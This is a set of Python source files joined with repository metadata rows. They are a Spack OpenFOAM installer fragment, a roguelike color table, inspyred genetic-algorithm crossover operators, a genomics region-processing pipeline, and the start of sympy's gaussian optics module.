ignored = re.compile(r'^(Allwmake|spack-).*')
files = [
f for f in glob.glob("*")
if os.path.isfile(f) and not ignored.search(f)
]
for f in files:
install(f, self.projectdir)
# Having wmake and ~source is actually somewhat pointless...
# Install 'etc' before 'bin' (for symlinks)
dirs = ['etc', 'bin', 'wmake']
if '+source' in spec:
dirs.extend(['applications', 'src', 'tutorials'])
for d in dirs:
install_tree(
d,
join_path(self.projectdir, d),
symlinks=True)
dirs = ['platforms']
if '+source' in spec:
dirs.extend(['doc'])
# Install platforms (and doc) skipping intermediate targets
ignored = ['src', 'applications', 'html', 'Guides']
for d in dirs:
install_tree(
d,
join_path(self.projectdir, d),
ignore=shutil.ignore_patterns(*ignored),
symlinks=True)
etc_dir = join_path(self.projectdir, 'etc')
rewrite_environ_files( # Adjust etc/bashrc and etc/cshrc
edits,
posix=join_path(etc_dir, 'bashrc'),
cshell=join_path(etc_dir, 'cshrc'))
self.install_links()
def install_links(self):
"""Add symlinks into bin/, lib/ (eg, for other applications)"""
# Make build log visible - it contains OpenFOAM-specific information
with working_dir(self.projectdir):
os.symlink(
join_path('.spack', 'build.out'),
join_path('log.' + str(self.foam_arch)))
if not self.config['link']:
return
# ln -s platforms/linux64GccXXX/lib lib
with working_dir(self.projectdir):
if os.path.isdir(self.archlib):
os.symlink(self.archlib, 'lib')
# (cd bin && ln -s ../platforms/linux64GccXXX/bin/* .)
with working_dir(join_path(self.projectdir, 'bin')):
for f in [
f for f in glob.glob(join_path('..', self.archbin, "*"))
if os.path.isfile(f)
]:
os.symlink(f, os.path.basename(f))
# -----------------------------------------------------------------------------
class OpenfoamArch(object):
"""OpenfoamArch represents architecture/compiler settings for OpenFOAM.
The string representation is WM_OPTIONS.
Keywords
label-size=[True] supports int32/int64
compile-option[=RpathOpt]
mplib[=USERMPI]
"""
#: Map spack compiler names to OpenFOAM compiler names
# By default, simply capitalize the first letter
compiler_mapping = {'intel': 'icc'}
def __init__(self, spec, **kwargs):
# Some user settings, to be adjusted manually or via variants
self.compiler = None # <- %compiler
self.arch_option = '64' # (32/64-bit on x86_64)
self.label_size = None # <- +int64
self.precision_option = 'DP' # <- +float32
self.compile_option = kwargs.get('compile-option', 'RpathOpt')
self.arch = None
self.options = None
self.rule = None
self.mplib = kwargs.get('mplib', 'USERMPI')
# Normally support WM_LABEL_OPTION, but not yet for foam-extend
if '+int64' in spec:
self.label_size = '64'
elif kwargs.get('label-size', True):
self.label_size = '32'
if '+float32' in spec:
self.precision_option = 'SP'
# spec.architecture.platform is like `uname -s`, but lower-case
platform = spec.architecture.platform
# spec.architecture.target is like `uname -m`
target = spec.architecture.target
if platform == 'linux':
if target == 'i686':
self.arch_option = '32' # Force consistency
elif target == 'x86_64':
if self.arch_option == '64':
platform += '64'
elif target == 'ia64':
platform += 'ia64'
elif target == 'armv7l':
platform += 'ARM7'
elif target == 'aarch64':
platform += 'ARM64'
elif target == 'ppc64':
platform += 'PPC64'
elif target == 'ppc64le':
platform += 'PPC64le'
elif platform == 'darwin':
if target == 'x86_64':
platform += 'Intel'
if self.arch_option == '64':
platform += '64'
# ... and others?
self.arch = platform
# Capitalized version of the compiler name, which usually corresponds
# to how OpenFOAM will camel-case things.
# Use compiler_mapping to handing special cases.
# Also handle special compiler options (eg, KNL)
comp = spec.compiler.name
if comp in self.compiler_mapping:
comp = self.compiler_mapping[comp]
comp = comp.capitalize()
if '+knl' in spec:
comp += 'KNL'
self.compiler = comp
self.rule = self.arch + self.compiler
# Build WM_OPTIONS
# ----
# WM_LABEL_OPTION=Int$WM_LABEL_SIZE
# WM_OPTIONS=$WM_ARCH$WM_COMPILER$WM_PRECISION_OPTION$WM_LABEL_OPTION$WM_COMPILE_OPTION
# or
# WM_OPTIONS=$WM_ARCH$WM_COMPILER$WM_PRECISION_OPTION$WM_COMPILE_OPTION
# ----
self.options = ''.join([
self.rule,
self.precision_option,
('Int' + self.label_size if self.label_size else ''),
self.compile_option])
def __str__(self):
return self.options
def __repr__(self):
return str(self)
def foam_dict(self):
"""Returns a dictionary for OpenFOAM prefs, bashrc, cshrc."""
return dict([
('WM_COMPILER', self.compiler),
('WM_ARCH_OPTION', self.arch_option),
('WM_LABEL_SIZE', self.label_size),
('WM_PRECISION_OPTION', self.precision_option),
('WM_COMPILE_OPTION', self.compile_option),
('WM_MPLIB', self.mplib),
])
def _rule_directory(self, projdir=None, general=False):
"""The wmake/rules/ compiler directory"""
if general:
relative = os.path.join('wmake', 'rules', 'General')
else:
relative = os.path.join('wmake', 'rules', self.rule)
if projdir:
return os.path.join(projdir, relative)
else:
return relative
def has_rule(self, projdir):
"""Verify that a wmake/rules/ compiler rule exists in the project
directory.
"""
# Insist on a wmake rule for this architecture/compiler combination
rule_dir = self._rule_directory(projdir)
if not os.path.isdir(rule_dir):
raise InstallError(
'No wmake rule for {0}'.format(self.rule))
if not re.match(r'.+Opt$', self.compile_option):
raise InstallError(
"WM_COMPILE_OPTION={0} is not type '*Opt'"
.format(self.compile_option))
return True
def create_rules(self, projdir, foam_pkg):
""" Create cRpathOpt,c++RpathOpt and mplibUSER,mplibUSERMPI
rules in the specified project directory.
The compiler rules are based on the respective cOpt,c++Opt rules
but with additional rpath information for the OpenFOAM libraries.
The rpath rules allow wmake to use spack information with minimal
modification to OpenFOAM.
The rpath is used for the installed libpath (continue to use
LD_LIBRARY_PATH for values during the build).
"""
# Note: the 'c' rules normally don't need rpath, since they are just
# used for statically linked wmake utilities, but left in anyhow.
# rpath for installed OpenFOAM libraries
rpath = '{0}{1}'.format(
foam_pkg.compiler.cxx_rpath_arg,
join_path(foam_pkg.projectdir, foam_pkg.archlib))
user_mpi = mplib_content(foam_pkg.spec)
rule_dir = self._rule_directory(projdir)
with working_dir(rule_dir):
# Compiler: copy existing cOpt,c++Opt and modify '*DBUG' value
for lang in ['c', 'c++']:
src = '{0}Opt'.format(lang)
dst = '{0}{1}'.format(lang, self.compile_option)
with open(src, 'r') as infile:
with open(dst, 'w') as outfile:
for line in infile:
line = line.rstrip()
outfile.write(line)
if re.match(r'^\S+DBUG\s*=', line):
outfile.write(' ')
outfile.write(rpath)
outfile.write('\n')
# MPI rules
for mplib in ['mplibUSER', 'mplibUSERMPI']:
with open(mplib, 'w') as out:
out.write("""# Use mpi from spack ({name})\n
PFLAGS = {FLAGS}
PINC = {PINC}
PLIBS = {PLIBS}
""".format(**user_mpi))
# -----------------------------------------------------------------------------
| matthiasdiener/spack | var/spack/repos/builtin/packages/openfoam-com/package.py | Python | lgpl-2.1 | 34,061 | [
"ParaView",
"VTK"
] | 601a4c3f2eaa263d6a49efa80807c5a48af7edb3402abc3f54f862827a9afb27 |
# -*- coding: utf-8 -*-
"""Color constants and a getter function."""
def get(color_name):
"""Return specified color if exists, else return white."""
color = _COLORS.get(color_name)
return color if color else 'white'
# converting color name to color code here couldn't change the color
# converting in render_all() works, I don't know why though
# hue may be specified in a number of ways:
# 'dark orange', '#RRGGBB' or '#AARRGGBB', 'R,G,B' or 'A,R,G,B'
_COLORS = {
'light_wall': 'orange', # R,G,B
'dark_wall': 'dark orange',
'darker_wall': 'darker orange',
'light_ground': 'dark amber',
'dark_ground': 'darker amber',
'darker_ground': 'darkest amber',
'desaturated_green': '63,127,63',
'darker_green': '0,127,0',
'dark_red': '191,0,0',
'white': '255,255,255',
'black': '0,0,0',
'red': '255,0,0',
'orange': '255,127,0',
'light_red': '255,114,114',
'darker_red': '127,0,0',
'system_msg': 'light green',
'violet': '127,0,255',
'yellow': '255, 255, 0',
'blue': '0,0,255',
'green': '0,255,0',
'light_cyan': '114,255,255',
'light_pink': '255,114,184',
'inventory_msg': 'light cyan',
'light_violet': '184, 114, 255',
'health': 'dark red',
'health_empty': 'darkest red',
'stamina': 'dark amber',
'stamina_empty': 'darkest amber',
'luck': 'dark sea',
'luck_empty': 'darkest sea',
'exp': 'blue',
'exp_empty': 'darker blue',
}
| kuraha4/roguelike-tutorial-python | src/colors.py | Python | mit | 1,464 | [
"Amber"
] | e0a8576a7dd8744caa48a2226a42b72dd4fbd04537eaa8001f92d7b3ddf490e9 |
"""
=================
:mod:`crossovers`
=================
.. Copyright 2012 Inspired Intelligence Initiative
.. This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
.. This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
.. You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
.. module:: crossovers
.. moduleauthor:: Aaron Garrett <aaron.lee.garrett@gmail.com>
"""
import copy
import functools
import math
try:
import cPickle as pickle
except ImportError:
import pickle
def crossover(cross):
"""Return an inspyred crossover function based on the given function.
This function generator takes a function that operates on only
two parent candidates to produce an iterable sequence of offspring
(typically two). The generator handles the pairing of selected
parents and collecting of all offspring.
The generated function chooses every odd candidate as a 'mom' and
every even as a 'dad' (discounting the last candidate if there is
an odd number). For each mom-dad pair, offspring are produced via
the `cross` function.
The given function ``cross`` must have the following signature::
offspring = cross(random, mom, dad, args)
This function is most commonly used as a function decorator with
the following usage::
@crossover
def cross(random, mom, dad, args):
# Implementation of paired crossing
pass
The generated function also contains an attribute named
``single_crossover`` which holds the original crossover function.
In this way, the original single-set-of-parents function can be
retrieved if necessary.
"""
@functools.wraps(cross)
def ecspy_crossover(random, candidates, args):
if len(candidates) % 2 == 1:
candidates = candidates[:-1]
moms = candidates[::2]
dads = candidates[1::2]
children = []
for i, (mom, dad) in enumerate(zip(moms, dads)):
cross.index = i
offspring = cross(random, mom, dad, args)
for o in offspring:
children.append(o)
return children
ecspy_crossover.single_crossover = cross
return ecspy_crossover
@crossover
def n_point_crossover(random, mom, dad, args):
"""Return the offspring of n-point crossover on the candidates.
This function performs n-point crossover (NPX). It selects *n*
random points without replacement at which to 'cut' the candidate
solutions and recombine them.
.. Arguments:
random -- the random number generator object
mom -- the first parent candidate
dad -- the second parent candidate
args -- a dictionary of keyword arguments
Optional keyword arguments in args:
- *crossover_rate* -- the rate at which crossover is performed
(default 1.0)
- *num_crossover_points* -- the number of crossover points used (default 1)
"""
crossover_rate = args.setdefault('crossover_rate', 1.0)
num_crossover_points = args.setdefault('num_crossover_points', 1)
children = []
if random.random() < crossover_rate:
num_cuts = min(len(mom)-1, num_crossover_points)
cut_points = random.sample(range(1, len(mom)), num_cuts)
cut_points.sort()
bro = copy.copy(dad)
sis = copy.copy(mom)
normal = True
for i, (m, d) in enumerate(zip(mom, dad)):
if i in cut_points:
normal = not normal
if not normal:
bro[i] = m
sis[i] = d
children.append(bro)
children.append(sis)
else:
children.append(mom)
children.append(dad)
return children
@crossover
def uniform_crossover(random, mom, dad, args):
"""Return the offspring of uniform crossover on the candidates.
This function performs uniform crossover (UX). For each element
of the parents, a biased coin is flipped to determine whether
the first offspring gets the 'mom' or the 'dad' element. An
optional keyword argument in args, ``ux_bias``, determines the bias.
.. Arguments:
random -- the random number generator object
mom -- the first parent candidate
dad -- the second parent candidate
args -- a dictionary of keyword arguments
Optional keyword arguments in args:
- *crossover_rate* -- the rate at which crossover is performed
(default 1.0)
- *ux_bias* -- the bias toward the first candidate in the crossover
(default 0.5)
"""
ux_bias = args.setdefault('ux_bias', 0.5)
crossover_rate = args.setdefault('crossover_rate', 1.0)
children = []
if random.random() < crossover_rate:
bro = copy.copy(dad)
sis = copy.copy(mom)
for i, (m, d) in enumerate(zip(mom, dad)):
if random.random() < ux_bias:
bro[i] = m
sis[i] = d
children.append(bro)
children.append(sis)
else:
children.append(mom)
children.append(dad)
return children
@crossover
def partially_matched_crossover(random, mom, dad, args):
"""Return the offspring of partially matched crossover on the candidates.
This function performs partially matched crossover (PMX). This type of
crossover assumes that candidates are composed of discrete values that
are permutations of a given set (typically integers). It produces offspring
that are themselves permutations of the set.
.. Arguments:
random -- the random number generator object
mom -- the first parent candidate
dad -- the second parent candidate
args -- a dictionary of keyword arguments
Optional keyword arguments in args:
- *crossover_rate* -- the rate at which crossover is performed
(default 1.0)
"""
crossover_rate = args.setdefault('crossover_rate', 1.0)
if random.random() < crossover_rate:
size = len(mom)
points = random.sample(range(size), 2)
x, y = min(points), max(points)
bro = copy.copy(dad)
bro[x:y+1] = mom[x:y+1]
sis = copy.copy(mom)
sis[x:y+1] = dad[x:y+1]
for parent, child in zip([dad, mom], [bro, sis]):
for i in range(x, y+1):
if parent[i] not in child[x:y+1]:
spot = i
while x <= spot <= y:
spot = parent.index(child[spot])
child[spot] = parent[i]
return [bro, sis]
else:
return [mom, dad]
@crossover
def arithmetic_crossover(random, mom, dad, args):
"""Return the offspring of arithmetic crossover on the candidates.
This function performs arithmetic crossover (AX), which is similar to a
generalized weighted averaging of the candidate elements. The allele
of each parent is weighted by the *ax_alpha* keyword argument, and
the allele of the complement parent is weighted by 1 - *ax_alpha*.
This averaging is only done on the alleles listed in the *ax_points*
keyword argument. If this argument is ``None``, then all alleles
are used. This means that if this function is used with all default
values, then offspring are simple averages of their parents.
This function also makes use of the bounder function as specified
in the EC's ``evolve`` method.
.. Arguments:
random -- the random number generator object
mom -- the first parent candidate
dad -- the second parent candidate
args -- a dictionary of keyword arguments
Optional keyword arguments in args:
- *crossover_rate* -- the rate at which crossover is performed
(default 1.0)
- *ax_alpha* -- the weight for the averaging (default 0.5)
- *ax_points* -- a list of points specifying the alleles to
recombine (default None)
"""
ax_alpha = args.setdefault('ax_alpha', 0.5)
ax_points = args.setdefault('ax_points', None)
crossover_rate = args.setdefault('crossover_rate', 1.0)
bounder = args['_ec'].bounder
children = []
if random.random() < crossover_rate:
bro = copy.copy(dad)
sis = copy.copy(mom)
if ax_points is None:
ax_points = list(range(min(len(bro), len(sis))))
for i in ax_points:
bro[i] = ax_alpha * mom[i] + (1 - ax_alpha) * dad[i]
sis[i] = ax_alpha * dad[i] + (1 - ax_alpha) * mom[i]
bro = bounder(bro, args)
sis = bounder(sis, args)
children.append(bro)
children.append(sis)
else:
children.append(mom)
children.append(dad)
return children
@crossover
def blend_crossover(random, mom, dad, args):
"""Return the offspring of blend crossover on the candidates.
This function performs blend crossover (BLX), which is similar to
arithmetic crossover with a bit of mutation. It creates offspring
whose values are chosen randomly from a range bounded by the
parent alleles but that is also extended by some amount proportional
to the *blx_alpha* keyword argument. It is this extension of the
range that provides the additional exploration. This averaging is
only done on the alleles listed in the *blx_points* keyword argument.
If this argument is ``None``, then all alleles are used. This function
also makes use of the bounder function as specified in the EC's
``evolve`` method.
.. Arguments:
random -- the random number generator object
mom -- the first parent candidate
dad -- the second parent candidate
args -- a dictionary of keyword arguments
Optional keyword arguments in args:
- *crossover_rate* -- the rate at which crossover is performed
(default 1.0)
- *blx_alpha* -- the blending rate (default 0.1)
- *blx_points* -- a list of points specifying the alleles to
recombine (default None)
"""
blx_alpha = args.setdefault('blx_alpha', 0.1)
blx_points = args.setdefault('blx_points', None)
crossover_rate = args.setdefault('crossover_rate', 1.0)
bounder = args['_ec'].bounder
children = []
if random.random() < crossover_rate:
bro = copy.copy(dad)
sis = copy.copy(mom)
if blx_points is None:
blx_points = list(range(min(len(bro), len(sis))))
for i in blx_points:
smallest, largest = min(mom[i], dad[i]), max(mom[i], dad[i])
delta = blx_alpha * (largest - smallest)
bro[i] = smallest - delta + random.random() * (largest - smallest + 2 * delta)
sis[i] = smallest - delta + random.random() * (largest - smallest + 2 * delta)
bro = bounder(bro, args)
sis = bounder(sis, args)
children.append(bro)
children.append(sis)
else:
children.append(mom)
children.append(dad)
return children
def heuristic_crossover(random, candidates, args):
"""Return the offspring of heuristic crossover on the candidates.
It performs heuristic crossover (HX), which is similar to the
update rule used in particle swarm optimization. This function
also makes use of the bounder function as specified in the EC's
``evolve`` method.
.. note::
This function assumes that candidates can be pickled (for hashing
as keys to a dictionary).
.. Arguments:
random -- the random number generator object
candidates -- the candidate solutions
args -- a dictionary of keyword arguments
Optional keyword arguments in args:
- *crossover_rate* -- the rate at which crossover is performed
(default 1.0)
"""
crossover_rate = args.setdefault('crossover_rate', 1.0)
bounder = args['_ec'].bounder
if len(candidates) % 2 == 1:
candidates = candidates[:-1]
# Since we don't have fitness information in the candidates, we need
# to make a dictionary containing the candidate and its corresponding
# individual in the population.
population = list(args['_ec'].population)
lookup = dict(zip([pickle.dumps(p.candidate, 1) for p in population], population))
moms = candidates[::2]
dads = candidates[1::2]
children = []
for mom, dad in zip(moms, dads):
if random.random() < crossover_rate:
bro = copy.copy(dad)
sis = copy.copy(mom)
mom_is_better = lookup[pickle.dumps(mom, 1)] > lookup[pickle.dumps(dad, 1)]
for i, (m, d) in enumerate(zip(mom, dad)):
negpos = 1 if mom_is_better else -1
val = d if mom_is_better else m
bro[i] = val + random.random() * negpos * (m - d)
sis[i] = val + random.random() * negpos * (m - d)
bro = bounder(bro, args)
sis = bounder(sis, args)
children.append(bro)
children.append(sis)
else:
children.append(mom)
children.append(dad)
return children
@crossover
def simulated_binary_crossover(random, mom, dad, args):
"""Return the offspring of simulated binary crossover on the candidates.
This function performs simulated binary crossover (SBX), following the
implementation in NSGA-II
`(Deb et al., ICANNGA 1999) <http://vision.ucsd.edu/~sagarwal/icannga.pdf>`_.
.. Arguments:
random -- the random number generator object
mom -- the first parent candidate
dad -- the second parent candidate
args -- a dictionary of keyword arguments
Optional keyword arguments in args:
- *crossover_rate* -- the rate at which crossover is performed
(default 1.0)
- *sbx_distribution_index* -- the non-negative distribution index
(default 10)
A small value of the `sbx_distribution_index` optional argument allows
solutions far away from parents to be created as child solutions,
while a large value restricts only near-parent solutions to be created as
child solutions.
"""
crossover_rate = args.setdefault('crossover_rate', 1.0)
if random.random() < crossover_rate:
di = args.setdefault('sbx_distribution_index', 10)
bounder = args['_ec'].bounder
bro = copy.copy(dad)
sis = copy.copy(mom)
for i, (m, d, lb, ub) in enumerate(zip(mom, dad, bounder.lower_bound, bounder.upper_bound)):
try:
if m > d:
m, d = d, m
beta = 1.0 + 2 * min(m - lb, ub - d) / float(d - m)
alpha = 2.0 - 1.0 / beta**(di + 1.0)
u = random.random()
if u <= (1.0 / alpha):
beta_q = (u * alpha)**(1.0 / float(di + 1.0))
else:
beta_q = (1.0 / (2.0 - u * alpha))**(1.0 / float(di + 1.0))
bro_val = 0.5 * ((m + d) - beta_q * (d - m))
bro_val = max(min(bro_val, ub), lb)
sis_val = 0.5 * ((m + d) + beta_q * (d - m))
sis_val = max(min(sis_val, ub), lb)
if random.random() > 0.5:
bro_val, sis_val = sis_val, bro_val
bro[i] = bro_val
sis[i] = sis_val
except ZeroDivisionError:
# The offspring already have legitimate values for every element,
# so no need to take any special action here.
pass
return [bro, sis]
else:
return [mom, dad]
@crossover
def laplace_crossover(random, mom, dad, args):
"""Return the offspring of Laplace crossover on the candidates.
This function performs Laplace crosssover (LX), following the
implementation specified in (Deep and Thakur, "A new crossover
operator for real coded genetic algorithms," Applied Mathematics
and Computation, Volume 188, Issue 1, May 2007, pp. 895--911).
This function also makes use of the bounder function as specified
in the EC's ``evolve`` method.
.. Arguments:
random -- the random number generator object
mom -- the first parent candidate
dad -- the second parent candidate
args -- a dictionary of keyword arguments
Optional keyword arguments in args:
- *crossover_rate* -- the rate at which crossover is performed
(default 1.0)
- *lx_location* -- the location parameter (default 0)
- *lx_scale* -- the scale parameter (default 0.5)
In some sense, the *lx_location* and *lx_scale* parameters can be thought
of as analogs in a Laplace distribution to the mean and standard
deviation of a Gaussian distribution. If *lx_scale* is near zero, offspring
will be produced near the parents. If *lx_scale* is farther from zero,
offspring will be produced far from the parents.
"""
crossover_rate = args.setdefault('crossover_rate', 1.0)
if random.random() < crossover_rate:
bounder = args['_ec'].bounder
a = args.setdefault('lx_location', 0)
b = args.setdefault('lx_scale', 0.5)
bro = copy.copy(dad)
sis = copy.copy(mom)
for i, (m, d) in enumerate(zip(mom, dad)):
u = random.random()
if random.random() <= 0.5:
beta = a - b * math.log(u)
else:
beta = a + b * math.log(u)
bro[i] = m + beta * abs(m - d)
sis[i] = d + beta * abs(m - d)
bro = bounder(bro, args)
sis = bounder(sis, args)
return [bro, sis]
else:
return [mom, dad]
| saulshanabrook/pushgp.py | thirdparty/inspyred-1.0/inspyred/ec/variators/crossovers.py | Python | bsd-3-clause | 18,632 | [
"Gaussian"
] | 460e28e396410cde671e38d3c38bd283363b12d980c3b39036062a330a9eeaf1 |
## Copyright (c) 2015 Ryan Koesterer GNU General Public License v3
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see <http://www.gnu.org/licenses/>.
import pandas as pd
import numpy as np
from uga import Parse
from Bio import bgzf
from uga import Process
import subprocess
import multiprocessing as mp
import sys
import os
import resource
import logging
import pickle
import glob
import pysam
logging.basicConfig(format='%(asctime)s - %(processName)s - %(name)s - %(message)s',level=logging.DEBUG)
logger = logging.getLogger("RunSnvgroup")
def process_regions(regions_df, cfg, cpu, log):
regions_df = regions_df[regions_df['cpu'] == cpu].reset_index(drop=True)
if log:
try:
log_file = open(cfg['out'] + '.cpu' + str(cpu) + '.log','w')
except:
print(Process.Error("unable to initialize log file " + cfg['out'] + '.cpu' + str(cpu) + '.log').out)
return 1
stdout_orig = sys.stdout
sys.stdout = log_file
tool_error = False
print('')
print('sourcing bash script ' + cfg['source'])
with open(cfg['source'],'r') as s:
base_cmd = s.read()
for k in range(len(regions_df.index)):
print('')
print('loading region ' + str(k+1) + '/' + str(len(regions_df.index)) + ' (' + regions_df['region'][k] + ') ...')
cmd = base_cmd.replace('UGA_FILE',cfg['file']).replace('UGA_OUT',cfg['out'] + '.cpu' + str(cpu) + '.chr' + regions_df['region'][k].replace(':','bp')).replace('UGA_REGION_BP',regions_df['region'][k].replace(':','bp')).replace('UGA_REGION',regions_df['region'][k]).replace('UGA_OUT',cfg['out'])
with open(cfg['out'] + '.source','w') as s:
s.write(cmd)
try:
p = subprocess.Popen(['sh','-c', cmd],stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1)
for line in iter(p.stdout.readline, ''):
sys.stdout.write(line)
p.wait()
except KeyboardInterrupt:
kill_all(p.pid)
tool_error = True
pass
status = 'processed region ' + str(k+1) + '/' + str(len(regions_df.index)) + ' (' + regions_df['region'][k] + ') ...'
print(status)
sys.stdout.flush()
if log:
sys.stdout = stdout_orig
log_file.close()
if tool_error:
return -1
else:
return 0
def RunTools(args):
cfg = Parse.generate_tools_cfg(args)
Parse.print_tools_options(cfg)
if not cfg['debug']:
logging.disable(logging.CRITICAL)
regions_df = pd.read_table(cfg['region_file'], compression='gzip' if cfg['region_file'].split('.')[-1] == 'gz' else None)
regions_df = regions_df[regions_df['job'] == int(cfg['job'])].reset_index(drop=True)
return_values = {}
print('')
print("initializing out file")
try:
bgzfile = bgzf.BgzfWriter(cfg['out'] + '.gz', 'wb')
except:
print(Process.Error("failed to initialize bgzip format out file " + cfg['out'] + '.gz').out)
return 1
if cfg['cpus'] > 1:
pool = mp.Pool(cfg['cpus']-1)
for i in range(1,cfg['cpus']):
return_values[i] = pool.apply_async(process_regions, args=(regions_df,cfg,i,True,))
print("submitting job on cpu " + str(i) + " of " + str(cfg['cpus']))
pool.close()
print("executing job for cpu " + str(cfg['cpus']) + " of " + str(cfg['cpus']) + " via main process")
main_return = process_regions(regions_df,cfg,cfg['cpus'],True)
pool.join()
if 1 in [return_values[i].get() for i in return_values] or main_return == 1:
print(Process.Error("error detected, see log files").out)
return 1
else:
main_return = process_regions(regions_df,cfg,1,True)
if main_return == 1:
print(Process.Error("error detected, see log files").out)
return 1
for i in range(1,cfg['cpus']+1):
try:
logfile = open(cfg['out'] + '.cpu' + str(i) + '.log', 'r')
except:
print(Process.Error("failed to initialize log file " + cfg['out'] + '.cpu' + str(i) + '.log').out)
return 1
print(logfile.read())
logfile.close()
os.remove(cfg['out'] + '.cpu' + str(i) + '.log')
written = False
for i in range(1,cfg['cpus']+1):
cpu_regions_df = regions_df[regions_df['cpu'] == i].reset_index()
for j in range(0,len(cpu_regions_df.index)):
f_temp=glob.glob(cfg['out'] + '.cpu' + str(i) + '.chr' + cpu_regions_df['region'][j].replace(':','bp') + '*.gz')[0]
try:
h=pysam.TabixFile(filename=f_temp,parser=pysam.asVCF())
except:
print(Process.Error("failed to load vcf file " + f_temp))
return 1
if not written:
for row in h.header:
bgzfile.write(str(row) + '\n')
written = True
h_iter = h.fetch(region=str(cpu_regions_df['chr'][j]))
for row in h_iter:
bgzfile.write(str(row) + '\n')
for f in glob.glob(cfg['out'] + '.cpu' + str(i) + '.chr' + cpu_regions_df['region'][j].replace(':','bp') + '.*'):
os.remove(f)
bgzfile.close()
print("indexing out file")
try:
pysam.tabix_index(cfg['out'] + '.gz',preset="vcf",force=True)
except:
print(Process.Error('failed to generate index').out)
return 1
print("process complete")
return 0
| rmkoesterer/uga | uga/RunTools.py | Python | gpl-3.0 | 5,404 | [
"pysam"
] | 3f3eff5c39b8de1771ab3fa3cff6aee7a58b81fe3a7c97f0d48fbd82df5e9b7a |
# -*- encoding: utf-8 -*-
"""
Gaussian optics.
The module implements:
- Ray transfer matrices for geometrical and gaussian optics.
See RayTransferMatrix, GeometricRay and BeamParameter
- Conjugation relations for geometrical and gaussian optics.
See geometric_conj*, gauss_conj and conjugate_gauss_beams
The conventions for the distances are as follows:
focal distance
positive for convergent lenses
object distance
positive for real objects
image distance
positive for real images
"""
from sympy import (atan2, Expr, I, im, Matrix, oo, pi, re, sqrt, sympify,
together)
from sympy.utilities.misc import filldedent
###
# A, B, C, D matrices
###
class RayTransferMatrix(Matrix):
"""
Base class for a Ray Transfer Matrix.
It should be used if there isn't already a more specific subclass mentioned
in See Also.
Parameters
==========
parameters : A, B, C and D or 2x2 matrix (Matrix(2, 2, [A, B, C, D]))
Examples
========
>>> from sympy.physics.gaussopt import RayTransferMatrix, ThinLens
>>> from sympy import Symbol, Matrix
>>> mat = RayTransferMatrix(1, 2, 3, 4)
>>> mat
[1, 2]
[3, 4]
>>> RayTransferMatrix(Matrix([[1, 2], [3, 4]]))
[1, 2]
[3, 4]
>>> mat.A
1
>>> f = Symbol('f')
>>> lens = ThinLens(f)
>>> lens
[ 1, 0]
[-1/f, 1]
>>> lens.C
-1/f
See Also
========
GeometricRay, BeamParameter,
FreeSpace, FlatRefraction, CurvedRefraction,
FlatMirror, CurvedMirror, ThinLens
References
==========
[1] http://en.wikipedia.org/wiki/Ray_transfer_matrix_analysis
"""
def __new__(cls, *args):
if len(args) == 4:
temp = ((args[0], args[1]), (args[2], args[3]))
elif len(args) == 1 \
and isinstance(args[0], Matrix) \
and args[0].shape == (2, 2):
temp = args[0]
else:
raise ValueError(filldedent('''
Expecting 2x2 Matrix or the 4 elements of
the Matrix but got %s''' % str(args)))
return Matrix.__new__(cls, temp)
def __mul__(self, other):
if isinstance(other, RayTransferMatrix):
return RayTransferMatrix(Matrix.__mul__(self, other))
elif isinstance(other, GeometricRay):
return GeometricRay(Matrix.__mul__(self, other))
elif isinstance(other, BeamParameter):
temp = self*Matrix(((other.q,), (1,)))
q = (temp[0]/temp[1]).expand(complex=True)
return BeamParameter(other.wavelen, \
together(re(q)), \
z_r = together(im(q)))
else:
return Matrix.__mul__(self, other)
@property
def A(self):
"""
The A parameter of the Matrix.
Examples
========
>>> from sympy.physics.gaussopt import RayTransferMatrix
>>> mat = RayTransferMatrix(1, 2, 3, 4)
>>> mat.A
1
"""
return self[0, 0]
@property
def B(self):
"""
The B parameter of the Matrix.
Examples
========
>>> from sympy.physics.gaussopt import RayTransferMatrix
>>> mat = RayTransferMatrix(1, 2, 3, 4)
>>> mat.B
2
"""
return self[0, 1]
@property
def C(self):
"""
The C parameter of the Matrix.
Examples
========
>>> from sympy.physics.gaussopt import RayTransferMatrix
>>> mat = RayTransferMatrix(1, 2, 3, 4)
>>> mat.C
3
"""
return self[1, 0]
@property
def D(self):
"""
The D parameter of the Matrix.
Examples
========
>>> from sympy.physics.gaussopt import RayTransferMatrix
>>> mat = RayTransferMatrix(1, 2, 3, 4)
>>> mat.D
4
"""
return self[1, 1]
class FreeSpace(RayTransferMatrix):
"""
Ray Transfer Matrix for free space.
Parameters
==========
distance
See Also
========
RayTransferMatrix
Examples
========
>>> from sympy.physics.gaussopt import FreeSpace
>>> from sympy import symbols
>>> d = symbols('d')
>>> FreeSpace(d)
[1, d]
[0, 1]
"""
def __new__(cls, d):
return RayTransferMatrix.__new__(cls, 1, d, 0, 1)
class FlatRefraction(RayTransferMatrix):
"""
Ray Transfer Matrix for refraction.
Parameters
==========
n1 : refractive index of one medium
n2 : refractive index of other medium
See Also
========
RayTransferMatrix
Examples
========
>>> from sympy.physics.gaussopt import FlatRefraction
>>> from sympy import symbols
>>> n1, n2 = symbols('n1 n2')
>>> FlatRefraction(n1, n2)
[1, 0]
[0, n1/n2]
"""
def __new__(cls, n1, n2):
n1, n2 = sympify((n1, n2))
return RayTransferMatrix.__new__(cls, 1, 0, 0, n1/n2)
class CurvedRefraction(RayTransferMatrix):
"""
Ray Transfer Matrix for refraction on curved interface.
Parameters
==========
R : radius of curvature (positive for concave)
n1 : refractive index of one medium
n2 : refractive index of other medium
See Also
========
RayTransferMatrix
Examples
========
>>> from sympy.physics.gaussopt import CurvedRefraction
>>> from sympy import symbols
>>> R, n1, n2 = symbols('R n1 n2')
>>> CurvedRefraction(R, n1, n2)
[ 1, 0]
